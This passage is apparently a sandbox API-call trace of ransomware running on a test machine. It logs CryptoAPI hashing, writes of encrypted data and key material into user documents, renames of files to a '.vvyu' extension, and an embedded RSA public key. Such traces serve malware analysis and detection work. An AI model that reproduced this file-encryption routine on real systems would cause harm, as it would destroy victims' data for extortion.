pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.262] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.262] GetLastError () returned 0x0 [0196.262] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.262] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0196.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.263] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.263] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.263] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa10) returned 0x2ea6a68 [0196.263] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1698 [0196.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2dc8 [0196.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea16e0 [0196.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2de0 [0196.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e10 [0196.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e70 [0196.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e28 [0196.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.264] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea79b0 [0196.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e10 | out: hHeap=0x620000) returned 1 [0196.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e28 | out: hHeap=0x620000) returned 1 [0196.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e70 | out: hHeap=0x620000) returned 1 [0196.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e70 [0196.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0196.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e28 [0196.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2e10 [0196.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0196.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0196.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0196.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0196.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e28 | out: hHeap=0x620000) returned 1 [0196.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e10 | out: hHeap=0x620000) returned 1 [0196.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e70 | out: hHeap=0x620000) returned 1 [0196.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.268] GetCurrentThreadId () returned 0x66c [0196.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea50b0 [0196.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.268] GetCurrentThreadId () returned 0x66c [0196.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2ea7480 [0196.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea7480 | out: hHeap=0x620000) returned 1 [0196.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0196.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e70 [0196.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e10 [0196.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0196.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e28 [0196.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2df8 [0196.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e88 [0196.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0196.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e58 [0196.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e40 [0196.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ea0 [0196.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e40 | out: hHeap=0x620000) returned 1 [0196.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e40 [0196.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e58 | out: hHeap=0x620000) returned 1 [0196.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0196.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e10 | out: hHeap=0x620000) returned 1 [0196.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e10 [0196.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0196.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e70 | out: hHeap=0x620000) returned 1 [0196.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0196.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ea0 | out: hHeap=0x620000) returned 1 [0196.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea79b0 [0196.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0196.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0196.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e10 | out: hHeap=0x620000) returned 1 [0196.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea7bc8 [0196.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea7bc8 | out: hHeap=0x620000) returned 1 [0196.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e40 | out: hHeap=0x620000) returned 1 [0196.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e88 | out: hHeap=0x620000) returned 1 [0196.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e28 | out: hHeap=0x620000) returned 1 [0196.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2df8 | out: hHeap=0x620000) returned 1 [0196.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2de0 | out: hHeap=0x620000) returned 1 [0196.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea16e0 | out: hHeap=0x620000) returned 1 [0196.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.280] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6a68*, nNumberOfBytesToWrite=0xa0a, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea6a68*, lpNumberOfBytesWritten=0x312fb14*=0xa0a, lpOverlapped=0x0) returned 1 [0196.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.280] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xa0f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.281] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.282] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.282] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.282] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.282] CloseHandle (hObject=0x568) returned 1 [0196.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea6a68 [0196.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.285] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\igCF Ho.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\igcf ho.ppt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\igCF Ho.ppt.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\igcf ho.ppt.vvyu")) returned 1 [0196.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.289] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0196.293] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e7b22f0, ftCreationTime.dwHighDateTime=0x1d8a0e4, ftLastAccessTime.dwLowDateTime=0x82c79ee0, ftLastAccessTime.dwHighDateTime=0x1d8a629, ftLastWriteTime.dwLowDateTime=0x82c79ee0, ftLastWriteTime.dwHighDateTime=0x1d8a629, nFileSizeHigh=0x0, nFileSizeLow=0x522e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkSu2OlxWSDLnSWvMq.ods", cAlternateFileName="JKSU2O~1.ODS")) returned 1 [0196.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.293] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\jkSu2OlxWSDLnSWvMq.ods") returned=".ods" [0196.293] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\jkSu2OlxWSDLnSWvMq.ods" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\jksu2olxwsdlnswvmq.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0196.294] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=21038) returned 1 [0196.294] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0196.297] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5208, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.297] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.300] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.300] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x522e, lpOverlapped=0x0) returned 1 [0196.301] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0196.301] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.301] lstrlenA 